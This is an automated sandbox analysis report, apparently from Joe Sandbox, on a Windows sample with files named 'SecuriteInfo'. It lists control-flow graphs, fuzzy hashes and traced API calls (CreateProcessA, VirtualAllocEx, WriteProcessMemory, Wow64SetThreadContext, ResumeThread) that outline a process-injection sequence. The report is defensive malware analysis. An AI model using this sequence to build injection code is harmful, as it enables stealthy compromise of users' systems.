VirtualAllocEx 47280->47284 47281 71d9f44 47281->47215 47282->47215 47283->47281 47284->47281 47286 71d9f1e 47285->47286 47291 71d9ece 47285->47291 47287 71d9f40 47286->47287 47288 71d9f30 47286->47288 47292 71d5ed8 VirtualAllocEx 47287->47292 47293 71d5ed1 VirtualAllocEx 47287->47293 47294 71d5ed8 VirtualAllocEx 47288->47294 47295 71d5ed1 VirtualAllocEx 47288->47295 47289 71d9f43 47289->47215 47290 71d9f44 47290->47215 47291->47215 47292->47289 47293->47289 47294->47290 47295->47290 47297 71d9f25 47296->47297 47299 71d5ed8 VirtualAllocEx 47297->47299 47300 71d5ed1 VirtualAllocEx 47297->47300 47298 71d9f44 47298->47215 47299->47298 47300->47298 47302 71d5f18 VirtualAllocEx 47301->47302 47304 71d5f55 47302->47304 47304->47276 47306 71d5ed8 VirtualAllocEx 47305->47306 47308 71d5f55 47306->47308 47308->47276 47310 71d6220 CreateProcessA 47309->47310 47312 71d646b 47310->47312 47314 71d62a9 CreateProcessA 47313->47314 47316 71d646b 47314->47316 47318 71d5958 ResumeThread 47317->47318 47320 71d5989 47318->47320 47320->47236 47322 71d5918 ResumeThread 47321->47322 47324 71d5989 47322->47324 47324->47236 47326 71d60d3 ReadProcessMemory 47325->47326 47328 71d6117 47326->47328 47328->47253 47330 71d6088 ReadProcessMemory 47329->47330 47332 71d6117 47330->47332 47332->47253 47107 adda88 47108 addace 47107->47108 47111 addc68 47108->47111 47114 add6f4 47111->47114 47115 addcd0 DuplicateHandle 47114->47115 47116 addbbb 47115->47116 47117 71da028 47118 71da1e8 47117->47118 47121 71da04e 47117->47121 47119 71da1b3 47119->47119 47121->47119 47122 71d71ac 47121->47122 47123 71da2a8 PostMessageW 47122->47123 47124 71da314 47123->47124 47124->47121 47337 ad4948 47338 ad4951 47337->47338 47339 ad4957 47338->47339 47343 ad4a43 47338->47343 47348 ad4104 47339->47348 47341 ad4972 47344 ad4a65 47343->47344 47352 ad4f58 47344->47352 47356 ad4f4b 47344->47356 47349 ad410f 47348->47349 47364 ad7260 47349->47364 47351 ad76aa 47351->47341 47354 ad4f7f 47352->47354 47353 ad505c 47353->47353 
47354->47353 47360 ad4bb4 47354->47360 47357 ad4ef3 47356->47357 47358 ad4f4f 47356->47358 47357->47357 47358->47357 47359 ad4bb4 CreateActCtxA 47358->47359 47359->47357 47361 ad5fe8 CreateActCtxA 47360->47361 47363 ad60ab 47361->47363 47365 ad726b 47364->47365 47368 ad743c 47365->47368 47367 ad7b55 47367->47351 47369 ad7447 47368->47369 47372 ad746c 47369->47372 47371 ad7c3a 47371->47367 47373 ad7477 47372->47373 47374 ad749c 2 API calls 47373->47374 47375 ad7d2d 47374->47375 47375->47371 47376 56e3118 47379 56e2238 47376->47379 47378 56e3137 47380 56e2243 47379->47380 47382 ad749c 2 API calls 47380->47382 47383 ad8d69 2 API calls 47380->47383 47381 56e31bc 47381->47378 47382->47381 47383->47381 47384 56e6798 47385 56e67e6 DrawTextExW 47384->47385 47387 56e683e 47385->47387 47103 56a4670 47104 56a46b2 47103->47104 47106 56a46b9 47103->47106 47105 56a470a CallWindowProcW 47104->47105 47104->47106 47105->47106 47125 56ac1d0 47126 56ac1f2 47125->47126 47127 ad749c 2 API calls 47125->47127 47128 ad8d69 2 API calls 47125->47128 47127->47126 47128->47126 47129 adb310 47130 adb31f 47129->47130 47132 adb3f8 47129->47132 47133 adb419 47132->47133 47134 adb43c 47132->47134 47133->47134 47140 adb6a0 47133->47140 47144 adb690 47133->47144 47134->47130 47135 adb434 47135->47134 47136 adb640 GetModuleHandleW 47135->47136 47137 adb66d 47136->47137 47137->47130 47141 adb6b4 47140->47141 47143 adb6d9 47141->47143 47148 ada790 47141->47148 47143->47135 47145 adb695 47144->47145 47146 adb6d9 47145->47146 47147 ada790 LoadLibraryExW 47145->47147 47146->47135 47147->47146 47149 adb860 LoadLibraryExW 47148->47149 47151 adb8d9 47149->47151 47151->47143
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a7de7bd27026d07afa9feb073fa10d7a03bcc5b145f06a8cc3532d4311749013
                        • Instruction ID: 69a02e60d0dbe3c85e5937a04ef95e1f70b6d7c00bd869dd2900c2aa98561515
                        • Opcode Fuzzy Hash: a7de7bd27026d07afa9feb073fa10d7a03bcc5b145f06a8cc3532d4311749013
                        • Instruction Fuzzy Hash: FD623571A00219DFDB54DFA8C984A5DBBB2FF88300F1582A8E559AB366CB31ED51CF40
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 73b3a5cf9d83599259a82e3b071827b149a3459c73b95a61fe02f3aca930c69b
                        • Instruction ID: 7596268a948c1deb49e19b93849dea551a7333b8e8e885696d9a9f81951b035a
                        • Opcode Fuzzy Hash: 73b3a5cf9d83599259a82e3b071827b149a3459c73b95a61fe02f3aca930c69b
                        • Instruction Fuzzy Hash: 7532BCB1B052158FDB29DB69C550BAEBBF6AF89300F11846AE106DB3A1CF34ED01CB51
                        Memory Dump Source
                        • Source File: 00000000.00000002.2205350634.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_56a0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fe23d2127767b36ecf1b19b59b9a7399057c0a43651f2bb7612f23e7f0b922a6
                        • Instruction ID: 832aa4dde65b6aa4433e0d03f06cdaa12ba5467c7e5ffd8e5900558651301529
                        • Opcode Fuzzy Hash: fe23d2127767b36ecf1b19b59b9a7399057c0a43651f2bb7612f23e7f0b922a6
                        • Instruction Fuzzy Hash: 7E1284B0C817498AD710CF65E94C1893BA1BB49318BD07E19D2615B3E1EBB4166EEF4C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2205350634.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_56a0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c445caee1bc72070c05a45934304ae79ca8146654e7dc7ed2a5ae584e22de8d0
                        • Instruction ID: 3117cd5314ff39f7eaf914443d6da3a49e390b87239408a204809d93144f35b4
                        • Opcode Fuzzy Hash: c445caee1bc72070c05a45934304ae79ca8146654e7dc7ed2a5ae584e22de8d0
                        • Instruction Fuzzy Hash: 64C1E8B0C817498BD710CF65E8481897BB1BB89318B917F19D1616B3E0EBB4166EEF48

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 174 71d6214-71d62b5 177 71d62ee-71d630e 174->177 178 71d62b7-71d62c1 174->178 183 71d6347-71d6376 177->183 184 71d6310-71d631a 177->184 178->177 179 71d62c3-71d62c5 178->179 181 71d62e8-71d62eb 179->181 182 71d62c7-71d62d1 179->182 181->177 185 71d62d5-71d62e4 182->185 186 71d62d3 182->186 194 71d63af-71d6469 CreateProcessA 183->194 195 71d6378-71d6382 183->195 184->183 188 71d631c-71d631e 184->188 185->185 187 71d62e6 185->187 186->185 187->181 189 71d6341-71d6344 188->189 190 71d6320-71d632a 188->190 189->183 192 71d632c 190->192 193 71d632e-71d633d 190->193 192->193 193->193 197 71d633f 193->197 206 71d646b-71d6471 194->206 207 71d6472-71d64f8 194->207 195->194 196 71d6384-71d6386 195->196 198 71d63a9-71d63ac 196->198 199 71d6388-71d6392 196->199 197->189 198->194 201 71d6394 199->201 202 71d6396-71d63a5 199->202 201->202 202->202 203 71d63a7 202->203 203->198 206->207 217 71d6508-71d650c 207->217 218 71d64fa-71d64fe 207->218 220 71d651c-71d6520 217->220 221 71d650e-71d6512 217->221 218->217 219 71d6500 218->219 219->217 223 71d6530-71d6534 220->223 224 71d6522-71d6526 220->224 221->220 222 71d6514 221->222 222->220 225 71d6546-71d654d 223->225 226 71d6536-71d653c 223->226 224->223 227 71d6528 224->227 228 71d654f-71d655e 225->228 229 71d6564 225->229 226->225 227->223 228->229 231 71d6565 229->231 231->231
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071D6456
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: c28e6d9b9e188800aa78d8135a246b80b492e929621b56d489668a86a1262be2
                        • Instruction ID: ae44d4e90f08cc4e9065bfbd5597e207cbfdacc7382f22277a85250563471462
                        • Opcode Fuzzy Hash: c28e6d9b9e188800aa78d8135a246b80b492e929621b56d489668a86a1262be2
                        • Instruction Fuzzy Hash: A1A15BB1D0025ADFEF15CF68C9417EEBBB2BF48350F1481A9E809A7284DB749985CF91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 232 71d6220-71d62b5 234 71d62ee-71d630e 232->234 235 71d62b7-71d62c1 232->235 240 71d6347-71d6376 234->240 241 71d6310-71d631a 234->241 235->234 236 71d62c3-71d62c5 235->236 238 71d62e8-71d62eb 236->238 239 71d62c7-71d62d1 236->239 238->234 242 71d62d5-71d62e4 239->242 243 71d62d3 239->243 251 71d63af-71d6469 CreateProcessA 240->251 252 71d6378-71d6382 240->252 241->240 245 71d631c-71d631e 241->245 242->242 244 71d62e6 242->244 243->242 244->238 246 71d6341-71d6344 245->246 247 71d6320-71d632a 245->247 246->240 249 71d632c 247->249 250 71d632e-71d633d 247->250 249->250 250->250 254 71d633f 250->254 263 71d646b-71d6471 251->263 264 71d6472-71d64f8 251->264 252->251 253 71d6384-71d6386 252->253 255 71d63a9-71d63ac 253->255 256 71d6388-71d6392 253->256 254->246 255->251 258 71d6394 256->258 259 71d6396-71d63a5 256->259 258->259 259->259 260 71d63a7 259->260 260->255 263->264 274 71d6508-71d650c 264->274 275 71d64fa-71d64fe 264->275 277 71d651c-71d6520 274->277 278 71d650e-71d6512 274->278 275->274 276 71d6500 275->276 276->274 280 71d6530-71d6534 277->280 281 71d6522-71d6526 277->281 278->277 279 71d6514 278->279 279->277 282 71d6546-71d654d 280->282 283 71d6536-71d653c 280->283 281->280 284 71d6528 281->284 285 71d654f-71d655e 282->285 286 71d6564 282->286 283->282 284->280 285->286 288 71d6565 286->288 288->288
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071D6456
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: d21194ea268527afb7153eed4b76f799c16dcd5c43bdd0abe1fcf8f36f8c67ea
                        • Instruction ID: f6a8eed92d3be9cfe9dbf826b270f18a0e15fcb073c64ed8a6c09b22673470bf
                        • Opcode Fuzzy Hash: d21194ea268527afb7153eed4b76f799c16dcd5c43bdd0abe1fcf8f36f8c67ea
                        • Instruction Fuzzy Hash: 6B914BB1D0021ADFEF15CF68C9417EEBBB2BF48350F1481A9E819A7284DB749985CF91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 289 adb3f8-adb417 290 adb419-adb426 call ada728 289->290 291 adb443-adb447 289->291 297 adb43c 290->297 298 adb428 290->298 293 adb449-adb453 291->293 294 adb45b-adb49c 291->294 293->294 300 adb49e-adb4a6 294->300 301 adb4a9-adb4b7 294->301 297->291 344 adb42e call adb6a0 298->344 345 adb42e call adb690 298->345 300->301 302 adb4b9-adb4be 301->302 303 adb4db-adb4dd 301->303 305 adb4c9 302->305 306 adb4c0-adb4c7 call ada734 302->306 308 adb4e0-adb4e7 303->308 304 adb434-adb436 304->297 307 adb578-adb638 304->307 310 adb4cb-adb4d9 305->310 306->310 339 adb63a-adb63d 307->339 340 adb640-adb66b GetModuleHandleW 307->340 311 adb4e9-adb4f1 308->311 312 adb4f4-adb4fb 308->312 310->308 311->312 313 adb4fd-adb505 312->313 314 adb508-adb511 call ada744 312->314 313->314 320 adb51e-adb523 314->320 321 adb513-adb51b 314->321 322 adb525-adb52c 320->322 323 adb541-adb54e 320->323 321->320 322->323 325 adb52e-adb53e call ada754 call ada764 322->325 330 adb571-adb577 323->330 331 adb550-adb56e 323->331 325->323 331->330 339->340 341 adb66d-adb673 340->341 342 adb674-adb688 340->342 341->342 344->304 345->304
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00ADB65E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2200030839.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ad0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 6f2564f70942030711a7309fdb62bc3da995691e950d3296885a6fc7819ae99b
                        • Instruction ID: 084cf3e4a920e590cd3f5dfa7723e75bac0a3ff5868e3f51b19071a7e6633ef0
                        • Opcode Fuzzy Hash: 6f2564f70942030711a7309fdb62bc3da995691e950d3296885a6fc7819ae99b
                        • Instruction Fuzzy Hash: E6811270A00B05CFDB24DF29D14179ABBF1FF88704F008A2AD44AD7B51DB74E90A8BA5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 346 56a1f24-56a1f96 347 56a1f98-56a1f9e 346->347 348 56a1fa1-56a1fa8 346->348 347->348 349 56a1faa-56a1fb0 348->349 350 56a1fb3-56a2052 CreateWindowExW 348->350 349->350 352 56a205b-56a2093 350->352 353 56a2054-56a205a 350->353 357 56a20a0 352->357 358 56a2095-56a2098 352->358 353->352 359 56a20a1 357->359 358->357 359->359
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056A2042
                        Memory Dump Source
                        • Source File: 00000000.00000002.2205350634.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_56a0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: 13ce4a469b5d1f6184e9c78f1dbc27c15e5378b30c95a4e8fd6ad49d9c7877d0
                        • Instruction ID: 56b2448feca7fab59efa59459fcf51f9479eb140d3383ab0728dc61e86ef9524
                        • Opcode Fuzzy Hash: 13ce4a469b5d1f6184e9c78f1dbc27c15e5378b30c95a4e8fd6ad49d9c7877d0
                        • Instruction Fuzzy Hash: DC51EEB1D003499FDB14CFA9C994ADEBFB5BF88310F64822AE819AB210D7759845CF90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 360 56a1f30-56a1f96 361 56a1f98-56a1f9e 360->361 362 56a1fa1-56a1fa8 360->362 361->362 363 56a1faa-56a1fb0 362->363 364 56a1fb3-56a2052 CreateWindowExW 362->364 363->364 366 56a205b-56a2093 364->366 367 56a2054-56a205a 364->367 371 56a20a0 366->371 372 56a2095-56a2098 366->372 367->366 373 56a20a1 371->373 372->371 373->373
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056A2042
                        Memory Dump Source
                        • Source File: 00000000.00000002.2205350634.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_56a0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: 932f59fecf885fa32f2f77a2b099e327dee6027c371cbfc43ca46d96b2425ebe
                        • Instruction ID: 78c5cae6e5c9a225c1da2e9b41f8f221937f9e054c5453b6385e948f3a7e11bd
                        • Opcode Fuzzy Hash: 932f59fecf885fa32f2f77a2b099e327dee6027c371cbfc43ca46d96b2425ebe
                        • Instruction Fuzzy Hash: B341B0B5D00349DFDB14CF99C984ADEBBB5BF48310F64822AE819AB310D775A845CF90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 374 ad4bb4-ad60a9 CreateActCtxA 377 ad60ab-ad60b1 374->377 378 ad60b2-ad610c 374->378 377->378 385 ad610e-ad6111 378->385 386 ad611b-ad611f 378->386 385->386 387 ad6121-ad612d 386->387 388 ad6130 386->388 387->388 390 ad6131 388->390 390->390
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00AD6099
                        Memory Dump Source
                        • Source File: 00000000.00000002.2200030839.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ad0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: d24e7a37acb8d8a689ad8ba1622c1677dffd150d77fb88920a6bc936cbf76e56
                        • Instruction ID: 1d011f6d4b829daa13e3c4e3b7d8628e30a8317ef40c04543c9f8e42cf678e09
                        • Opcode Fuzzy Hash: d24e7a37acb8d8a689ad8ba1622c1677dffd150d77fb88920a6bc936cbf76e56
                        • Instruction Fuzzy Hash: AF41EEB0C0071DCBEB24DFA9C944B9EBBF5BF88704F20816AD409AB251DBB56945CF90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 407 56a4670-56a46ac 408 56a475c-56a477c 407->408 409 56a46b2-56a46b7 407->409 415 56a477f-56a478c 408->415 410 56a470a-56a4742 CallWindowProcW 409->410 411 56a46b9-56a46f0 409->411 412 56a474b-56a475a 410->412 413 56a4744-56a474a 410->413 418 56a46f9-56a4708 411->418 419 56a46f2-56a46f8 411->419 412->415 413->412 418->415 419->418
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 056A4731
                        Memory Dump Source
                        • Source File: 00000000.00000002.2205350634.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_56a0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        • Opcode ID: 394f7ca1fb5b74a2c0a4cd548c47b745164db06dfb21a8f77691dd03b40780cc
                        • Instruction ID: bce5e972c50aeaaffb0ef2c5f8a7b41b3e750812a5826a3e8dab607bfe91e14b
                        • Opcode Fuzzy Hash: 394f7ca1fb5b74a2c0a4cd548c47b745164db06dfb21a8f77691dd03b40780cc
                        • Instruction Fuzzy Hash: 984118B9900349CFDB15CF99C948BAABBF5FF88314F248459D519AB321D7B4A841CFA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 391 ad5fe7-ad60a9 CreateActCtxA 393 ad60ab-ad60b1 391->393 394 ad60b2-ad610c 391->394 393->394 401 ad610e-ad6111 394->401 402 ad611b-ad611f 394->402 401->402 403 ad6121-ad612d 402->403 404 ad6130 402->404 403->404 406 ad6131 404->406 406->406
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00AD6099
                        Memory Dump Source
                        • Source File: 00000000.00000002.2200030839.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ad0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 0f4aa64f92ac655c50166625c068105e704163c51a509101f3b4614eff3def72
                        • Instruction ID: 13a18589f3eb0d99a66d731c53c85a78d325077a690f76dfe364de3c4a94ce4d
                        • Opcode Fuzzy Hash: 0f4aa64f92ac655c50166625c068105e704163c51a509101f3b4614eff3def72
                        • Instruction Fuzzy Hash: 1641DFB0C0071DCBEB24DFA9C944B9EBBF5BF48704F20816AD409AB251DBB56946CF90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 421 71d5df9-71d5dfc 422 71d5dfe-71d5e4b 421->422 423 71d5dd4-71d5dea 421->423 426 71d5e4d-71d5e59 422->426 427 71d5e5b-71d5e8b Wow64SetThreadContext 422->427 426->427 429 71d5e8d-71d5e93 427->429 430 71d5e94-71d5ec4 427->430 429->430
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071D5E7E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 3f40007abaad59caaf73dcd855e227b3a1cc158b580e6e63dee990109bad8889
                        • Instruction ID: 823cb50f8851466567475f0cf0052c9434418c75b390ffb0375282d7ada9917e
                        • Opcode Fuzzy Hash: 3f40007abaad59caaf73dcd855e227b3a1cc158b580e6e63dee990109bad8889
                        • Instruction Fuzzy Hash: DF219CB29003098FDB10DFAAC5817EEFBF4EF88364F10842AD518A7240C778A945CFA0

                        Control-flow Graph (rendered graph not reproduced): entry block 71d5f90, blocks span 71d5f90-71d606e; WriteProcessMemory is called in block 71d5ff6-71d6035.
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071D6028
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 456e2c9c7a2876524d547769411092438ba1997f58e87303e8f0f4e32df3af03
                        • Instruction ID: 6ea14da445cd5f5d637c2e90b0b58f0b8ddb814a3ca36a187c4ea7a6b158d72b
                        • Opcode Fuzzy Hash: 456e2c9c7a2876524d547769411092438ba1997f58e87303e8f0f4e32df3af03
                        • Instruction Fuzzy Hash: 5C2139B190035A9FDB10CFA9C981BDEBBF5FF48310F108429E958A7240D7789954CBA0

                        Control-flow Graph (rendered graph not reproduced): entry block 56e6790, blocks span 56e6790-56e6862; DrawTextExW is called in block 56e6803-56e683c.
                        APIs
                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 056E682F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2205956961.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_56e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: DrawText
                        • String ID:
                        • API String ID: 2175133113-0
                        • Opcode ID: a20179aae41f58e5926e4221fcb5860158b04b6f93081fe6e656d9963424956a
                        • Instruction ID: 0fe8ba3a7816d60d96a61145f7e86899827d23907ac99d8d130b6930ae6513f3
                        • Opcode Fuzzy Hash: a20179aae41f58e5926e4221fcb5860158b04b6f93081fe6e656d9963424956a
                        • Instruction Fuzzy Hash: E231E2B59012099FDB10CF9AD984A9EBBF4BB58320F14842AE919A7710D775A544CFA0

                        Control-flow Graph (rendered graph not reproduced): entry block 71d5f98, blocks span 71d5f98-71d606e; WriteProcessMemory is called in block 71d5ff6-71d6035.
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071D6028
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: acb8dcfb4347308ca45104b89539697073c9b4f54f8399d56ca6b264a7f3f45c
                        • Instruction ID: 49bc5db711bd9ef4c95ad0cf6989346b795cf794b17bd21435bd2f1bc509219f
                        • Opcode Fuzzy Hash: acb8dcfb4347308ca45104b89539697073c9b4f54f8399d56ca6b264a7f3f45c
                        • Instruction Fuzzy Hash: 172126B190034A9FDB10CFA9C981BEEBBF5FF48310F10842AE918A7240D7789954CBA4

                        Control-flow Graph (rendered graph not reproduced): entry block 56e6798, blocks span 56e6798-56e6862; DrawTextExW is called in block 56e6803-56e683c.
                        APIs
                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 056E682F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2205956961.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_56e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: DrawText
                        • String ID:
                        • API String ID: 2175133113-0
                        • Opcode ID: b0369b364eb56e5f3b9707d7b172c3c0662c54fea1dbaf1dd5c099e130e1aeb4
                        • Instruction ID: 1c3e51526b1e6f40f877f572362ad9f19adf2ad605cc05b2fda29fff4671c5d0
                        • Opcode Fuzzy Hash: b0369b364eb56e5f3b9707d7b172c3c0662c54fea1dbaf1dd5c099e130e1aeb4
                        • Instruction Fuzzy Hash: 1921E0B5D012099FDB10CF9AD884A9EFBF4BB58320F14842AE919A7310D774A944CFA0

                        Control-flow Graph (rendered graph not reproduced): entry block 71d6080, blocks span 71d6080-71d614e; ReadProcessMemory is called in block 71d6080-71d6115.
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071D6108
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 3cc162d5d2577f368854daed5f3c828cd80131d2f953b3ecdb682c7b0df88cef
                        • Instruction ID: b20371d74fc667d3854c5d0393cb725daab6b9726f88dd91fc6c3fd175a0bb9f
                        • Opcode Fuzzy Hash: 3cc162d5d2577f368854daed5f3c828cd80131d2f953b3ecdb682c7b0df88cef
                        • Instruction Fuzzy Hash: 1F2139B18003499FDB10CFAAC941BEEBBF5FF48320F10842AE518A7241C7789954CBA5
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00ADDC96,?,?,?,?,?), ref: 00ADDD57
                        Memory Dump Source
                        • Source File: 00000000.00000002.2200030839.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ad0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 66712022fa73d7a2cd0b8bbbc39e3ae678c48cba6dbd5df9e6c1b17a0108a534
                        • Instruction ID: 0faa7b467987100309de406c91d97d5cf05def7aa398dda4c6c2501494e760a1
                        • Opcode Fuzzy Hash: 66712022fa73d7a2cd0b8bbbc39e3ae678c48cba6dbd5df9e6c1b17a0108a534
                        • Instruction Fuzzy Hash: 6021E3B5900249DFDB10CFAAD984AEEBFF5EB48724F14845AE919A3310D374A950CFA4
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071D5E7E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 373a6f0069b6aca96e4c06971a6ab867635b2b22fb9e15752bfd378f611e5dc9
                        • Instruction ID: 705f3f250cf14fff1f958eb8497f653926d7233266d190e3c3214da22d31d30c
                        • Opcode Fuzzy Hash: 373a6f0069b6aca96e4c06971a6ab867635b2b22fb9e15752bfd378f611e5dc9
                        • Instruction Fuzzy Hash: 7F2149B19003098FDB10DFAAC5857EEFBF5EF88324F148429D519A7240DB78A944CFA5
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071D6108
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
